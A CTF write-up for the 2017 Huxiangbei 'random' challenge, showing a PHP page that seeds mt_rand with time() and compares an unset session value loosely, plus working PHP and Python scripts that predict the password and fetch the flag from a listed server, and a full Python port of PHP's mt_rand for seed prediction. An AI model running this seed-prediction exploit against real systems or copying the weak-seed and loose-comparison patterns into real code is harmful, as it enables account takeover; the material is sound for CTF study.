random
A quick look shows the source code is disclosed:
<?php
error_reporting(0);                     // notices such as "undefined index" are silenced
$flag = "*********************";
echo "please input a rand_num !";
function create_password($pw_length = 10){
    $randpwd = "";
    for ($i = 0; $i < $pw_length; $i++){
        $randpwd .= chr(mt_rand(100, 200));   // one byte per mt_rand() call; values above 0x7f are non-ASCII
    }
    return $randpwd;
}
session_start();
mt_srand(time());                       // the seed is the current Unix second, so every output is predictable
$pwd=create_password();
echo $pwd.'||';                         // the freshly generated password is even printed back
if($pwd == $_GET['pwd']){
    echo "first";
    if($_SESSION['userLogin']==$_GET['login'])   // loose comparison; both sides are NULL on a fresh session
        echo "Nice , you get the flag it is ".$flag ;
}else{
    echo "Wrong!";
}
$_SESSION['userLogin']=create_password(32).rand();   // only assigned after the check has run
?>
So it comes down to the random-number seed: mt_srand() is seeded with the timestamp, time(). Guessing that the server's clock is standard (NTP-synced) time, we stand up a local PHP script that replays the same seed and dumps the first 42 outputs (the ten bytes of $pwd followed by the 32 that go into userLogin), then hit the server with them from a separate Python script. Two things have to hold for this to work: the local and remote requests must land in the same second, because time() is the seed, and the local interpreter's mt_rand() must behave exactly like the server's (PHP 7.1 changed both the generator and the way mt_rand(min, max) scales into the range, so use the same major version). Since index.php echoes $pwd on every request, the prediction for a given second can be checked against what the server printed for that second.
The PHP script:
<?php
session_start();
mt_srand(time());                       // same seed as the target: the current second
for ($i = 0; $i < 42; $i++){
    echo mt_rand(100, 200);             // outputs 1-10 form $pwd, 11-42 would form userLogin
    echo ",";
}
?>
Then the Python script:
import requests

url_local = 'http://127.0.0.1/test.php'          # local PHP replaying mt_srand(time()); mt_rand(100, 200)
url = 'http://114.215.138.89:10080/index.php?'

# Ask the local script for this second's outputs; this request and the one to
# the target below must fall in the same second of the same (synced) clock.
what = requests.get(url_local).text.split(',')
pwd = ''
for i in range(10):
    # chr(100..200) includes bytes above 0x7f, so send every byte percent-encoded
    pwd += '%%%02x' % int(what[i])
print(pwd)
tempurl = url + "pwd=" + pwd
print(tempurl)
# A bare requests.get() carries no PHP session cookie, so the server starts a fresh
# session in which $_SESSION['userLogin'] is unset and the second check passes
# without any 'login' parameter.
html = requests.get(tempurl).text
print(html)
#hxb2017{6583be26c1403c25677c03ac7b3d1f22}
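The same prediction without a local PHP interpreter, as an added example that is not part of the original writeup: a pure-Python port of PHP's mt_srand()/mt_rand() (the class and function names are my own, not PHP's or the challenge's). It implements both generator flavours, because the challenge server's PHP version is not known: the pre-7.1 generator (also selectable as MT_RAND_PHP on newer versions), whose twist reads the low bit of the wrong state word and which scales mt_rand()>>1 into the range with floating-point arithmetic, and the PHP 7.1+ generator with the standard MT19937 twist and rejection sampling. Only constructed inputs are used; the target URL from the writeup appears in a comment only.

```python
"""Predict the challenge password without a local PHP: a pure-Python port of
PHP's mt_srand()/mt_rand().  Added example for this writeup; class and
function names are my own, not PHP's or the challenge's.

PHP's mt_rand() is MT19937 with two version-dependent quirks:
  * legacy (PHP < 7.1, or MT_RAND_PHP mode later): the twist tests the low
    bit of the wrong state word, and mt_rand(min, max) scales mt_rand() >> 1
    into the range with floating-point arithmetic;
  * modern (PHP 7.1+ default): standard twist, unbiased rejection sampling.
"""
import time

N, M = 624, 397
MATRIX_A = 0x9908B0DF
PHP_MT_RAND_MAX = 0x7FFFFFFF
MASK32 = 0xFFFFFFFF


class PhpMt19937:
    """State machine behind PHP's mt_srand()/mt_rand()."""

    def __init__(self, seed, legacy=True):
        self.legacy = legacy
        s = self.state = [0] * N
        s[0] = seed & MASK32                      # mt_srand() truncates the seed to uint32
        for i in range(1, N):                     # php_mt_initialize()
            s[i] = (1812433253 * (s[i - 1] ^ (s[i - 1] >> 30)) + i) & MASK32
        self.reload()

    def twist(self, m, u, v):
        mixed = (u & 0x80000000) | (v & 0x7FFFFFFF)
        low = u if self.legacy else v             # the PHP < 7.1 bug: loBit(u) instead of loBit(v)
        return m ^ (mixed >> 1) ^ (MATRIX_A if low & 1 else 0)

    def reload(self):                             # php_mt_reload(), updated in place like the C code
        s = self.state
        for i in range(N - M):
            s[i] = self.twist(s[i + M], s[i], s[i + 1])
        for i in range(N - M, N - 1):
            s[i] = self.twist(s[i + M - N], s[i], s[i + 1])
        s[N - 1] = self.twist(s[M - 1], s[N - 1], s[0])
        self.left, self.next = N, 0

    def raw(self):                                # php_mt_rand(): one tempered 32-bit word
        if self.left == 0:
            self.reload()
        self.left -= 1
        y = self.state[self.next]
        self.next += 1
        y ^= y >> 11
        y ^= (y << 7) & 0x9D2C5680
        y ^= (y << 15) & 0xEFC60000
        return (y ^ (y >> 18)) & MASK32

    def mt_rand(self, lo=None, hi=None):
        """mt_rand() or mt_rand(lo, hi) as the PHP userland function returns it."""
        if lo is None:
            return self.raw() >> 1
        if self.legacy:                           # RAND_RANGE: lo + (hi-lo+1) * n / 2^31, truncated
            n = self.raw() >> 1
            return lo + int((hi - lo + 1.0) * (n / (PHP_MT_RAND_MAX + 1.0)))
        umax = hi - lo + 1                        # php_mt_rand_range(): rejection sampling, no bias
        if umax & (umax - 1) == 0:
            return lo + (self.raw() & (umax - 1))
        limit = MASK32 - (MASK32 % umax) - 1
        r = self.raw()
        while r > limit:
            r = self.raw()
        return lo + r % umax


def predict_password(seed, length=10, legacy=True):
    """create_password() from the challenge, replayed for a given time() seed."""
    rng = PhpMt19937(seed, legacy=legacy)
    return bytes(rng.mt_rand(100, 200) for _ in range(length))


def percent_encode(pwd):
    """Encode every byte as %XX: chr(100..200) includes bytes above 0x7f and the
    server compares the raw decoded bytes, so nothing is left to a charset guess."""
    return "".join("%%%02X" % b for b in pwd)


def candidates(now, skew=2, legacy=True):
    """Encoded passwords for the seconds around `now`, keyed by seed, to absorb
    clock drift between attacker and server."""
    return {t: percent_encode(predict_password(t, legacy=legacy))
            for t in range(now - skew, now + skew + 1)}


if __name__ == "__main__":
    # Try each value as index.php?pwd=<value> within the same second and with
    # no session cookie, so $_SESSION['userLogin'] stays unset on the server.
    for seed, enc in candidates(int(time.time())).items():
        print(seed, enc)
```

Seed it with the Unix second in which the server handles the request; trying the neighbouring seconds covers clock skew. The first output after mt_srand(1) is 1244335972 on PHP < 7.1 and 895547922 on PHP 7.1+, and the port reproduces both, so comparing one predicted password with the $pwd the page echoes tells you which flavour the server runs.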
In fact, getting past the first check is all it takes. The challenge author's mistake is that the userLogin comparison is a loose one: on a fresh session $_SESSION['userLogin'] has not been assigned yet (it is only set after the check), and if no login parameter is sent $_GET['login'] is likewise unset, so NULL == NULL holds and the comparison passes. So we simply bypass it outright.
hxb2017{6583be26c1403c25677c03ac7b3d1f22}
2017湖湘杯-Writeup